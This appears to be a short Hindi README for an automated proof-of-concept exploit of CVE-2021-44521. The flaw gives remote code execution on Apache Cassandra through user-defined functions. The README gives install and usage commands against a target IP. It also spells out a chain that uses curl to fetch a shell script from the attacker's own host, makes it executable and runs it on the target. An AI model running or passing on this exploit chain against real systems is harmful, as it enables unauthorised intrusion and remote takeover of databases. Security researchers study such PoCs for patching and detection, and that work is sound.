
CVE-2021-44521 के लिए स्वचालित प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो उपयोगकर्ता-परिभाषित फ़ंक्शनों के माध्यम से Apache Cassandra पर रिमोट कोड निष्पादन सक्षम करता है। लक्ष्य IP पर मनमाने कमांड निष्पादित करता है।
CVE-2021-44521 का स्वचालित PoC मूल PoC का श्रेय: https://jfrog.com/blog/cve-2021-44521-exploiting-apache-cassandra-user-defined-functions-for-remote-code-execution/
Cassandra-driver
pip3 install cassandra-driver
python3 poc.py <ip> <cmd>
ध्यान दें कि आप एक समय में एक से अधिक कमांड नहीं चला सकते, और अभी तक पाइप (pipes) का उपयोग भी नहीं कर सकते। इसलिए चलाएँ
pyhon3 poc.py <ip> "curl http://<your-ip>/shell.sh -o /tmp/shell.sh"
python3 poc.py <ip> "chmod +x /tmp/shell.sh"
python3 poc.py <ip> "/tmp/shell.sh"